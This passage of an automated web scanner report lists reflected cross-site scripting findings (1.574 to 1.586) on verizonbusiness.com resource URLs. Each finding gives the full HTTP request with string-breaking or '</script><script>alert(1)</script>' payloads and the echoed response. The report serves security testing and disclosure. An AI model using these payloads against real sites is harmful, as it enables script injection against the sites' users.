1.574. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e5d'%3bf3827fd452d was submitted in the REST URL parameter 1. This input was echoed as f8e5d';f3827fd452d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf8e5d'%3bf3827fd452d/1002a1a7-111-Energy+and+Utilities.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesf8e5d';f3827fd452d/1002a1a7-111-Energy+and+Utilities.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.575. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7e0</script><script>alert(1)</script>4eebb40e7f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a7-111-Energy+and+Utilities.xml3e7e0</script><script>alert(1)</script>4eebb40e7f5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "dfdebcd27bdbe3054feaff59ee9b0068"
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:02 GMT
Content-Length: 32254
Connection: close
Set-Cookie: BERT=VRID%3ddde4d1bd-ee75-40ec-82b0-72c174b20aa9|VTID%3debeff2aa-88f9-4ad4-b8e4-c3e960a37568|SX%3d1289954522|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a7-111-Energy+and+Utilities.xml3e7e0</script><script>alert(1)</script>4eebb40e7f5</url>
...[SNIP]...

1.576. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c56bd'%3b87f7b6050ac was submitted in the REST URL parameter 2. This input was echoed as c56bd';87f7b6050ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c56bd'%3b87f7b6050ac HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:03 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/c56bd';87f7b6050ac'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.577. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8bdb"%3bcc80320f83e was submitted in the REST URL parameter 1. This input was echoed as c8bdb";cc80320f83e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc8bdb"%3bcc80320f83e/1002a2a1-111-Business+Continuity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc8bdb";cc80320f83e/1002a2a1-111-Business+Continuity.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.578. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1d5'%3b1eae690fc61 was submitted in the REST URL parameter 1. This input was echoed as 1e1d5';1eae690fc61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1e1d5'%3b1eae690fc61/1002a2a1-111-Business+Continuity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources1e1d5';1eae690fc61/1002a2a1-111-Business+Continuity.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.579. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1ad'%3b28303c63a05 was submitted in the REST URL parameter 2. This input was echoed as 6e1ad';28303c63a05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/6e1ad'%3b28303c63a05 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/6e1ad';28303c63a05'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.580. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f23</script><script>alert(1)</script>e000cc915b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a1-111-Business+Continuity.xml31f23</script><script>alert(1)</script>e000cc915b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e239dccb3725e4506fe71edcc99e6157"
Last-Modified: Wed, 17 Nov 2010 00:20:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:20:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dcaff9112-2645-4173-b59b-e1ece2d78b02|VTID%3de1888a62-ed73-4a09-95c0-e9225d48400e|SX%3d1289954456|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:24:40 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:20:56 GMT
Content-Length: 33730

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a1-111-Business+Continuity.xml31f23</script><script>alert(1)</script>e000cc915b</url>
...[SNIP]...

1.581. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a03a'%3bcefbe8dc7d6 was submitted in the REST URL parameter 1. This input was echoed as 3a03a';cefbe8dc7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3a03a'%3bcefbe8dc7d6/1002a2a10-111-Security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources3a03a';cefbe8dc7d6/1002a2a10-111-Security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.582. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f46e"%3ba2ecaf928d1 was submitted in the REST URL parameter 1. This input was echoed as 7f46e";a2ecaf928d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f46e"%3ba2ecaf928d1/1002a2a10-111-Security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:21 GMT
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7f46e";a2ecaf928d1/1002a2a10-111-Security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.583. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e63'%3bdecedaf7f16 was submitted in the REST URL parameter 2. This input was echoed as 42e63';decedaf7f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/42e63'%3bdecedaf7f16 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/42e63';decedaf7f16'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.584. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d07</script><script>alert(1)</script>210f408e6e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a10-111-Security.xmlf8d07</script><script>alert(1)</script>210f408e6e4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "5310c48f248aa1ae2fbd241e707a7282"
Last-Modified: Wed, 17 Nov 2010 00:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d4e75142d-36fb-4ed8-a578-c8f0f2c8f50b|VTID%3df08c3071-fb04-4503-9f5c-997b13301173|SX%3d1289954830|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:54 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:27:10 GMT
Content-Length: 101280

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a10-111-Security.xmlf8d07</script><script>alert(1)</script>210f408e6e4</url>
...[SNIP]...

1.585. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0f61"%3b486aed0de2b was submitted in the REST URL parameter 1. This input was echoed as f0f61";486aed0de2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf0f61"%3b486aed0de2b/1002a2a11-111-Voice.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf0f61";486aed0de2b/1002a2a11-111-Voice.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.586. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8957c'%3b782f7b3d71b was submitted in the REST URL parameter 1. This input was echoed as 8957c';782f7b3d71b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8957c'%3b782f7b3d71b/1002a2a11-111-Voice.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:44 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources8957c';782f7b3d71b/1002a2a11-111-Voice.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
